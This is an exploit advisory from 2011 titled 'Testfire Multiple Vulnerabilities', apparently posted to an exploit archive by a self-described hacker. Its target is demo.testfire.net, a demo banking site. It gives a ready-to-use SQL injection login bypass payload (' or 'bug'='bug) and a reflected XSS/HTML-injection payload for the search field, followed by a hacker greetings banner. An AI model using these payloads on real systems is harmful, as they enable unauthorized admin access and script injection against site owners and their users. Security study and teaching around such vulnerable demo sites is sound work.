%+
$.......#........4.........|)........0............\/\/       %+


                                              %+
                                                       %+

                                              %+++++++++++++++++++++++++++++
+++++++++++


# Exploit Title:Testfire Multiple Vulnerabilities
# Vendor: www.testfire.net
# Date: 22nd july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork: Copyright © 2011, Watchfire Corporation
************************************************************
************************************************************
*****************************************************************
(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://demo.testfire.net/bank/login.aspx

EXPLOIT:
                 Username: ' or 'bug'='bug
                 Password: ' or 'bug'='bug
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.

Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS(&HTML) Vulnerability( search field)

   {Demo}:   http://demo.testfire.net/search.aspx
    Exploit:  ">><marquee><h1><b><a href="http://www.google.com
">BUG</a></b></h1></marquee>

************************************************************
************************************************************
*****************************************************************
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--
************************************************************
************************************************************
*****************************************************************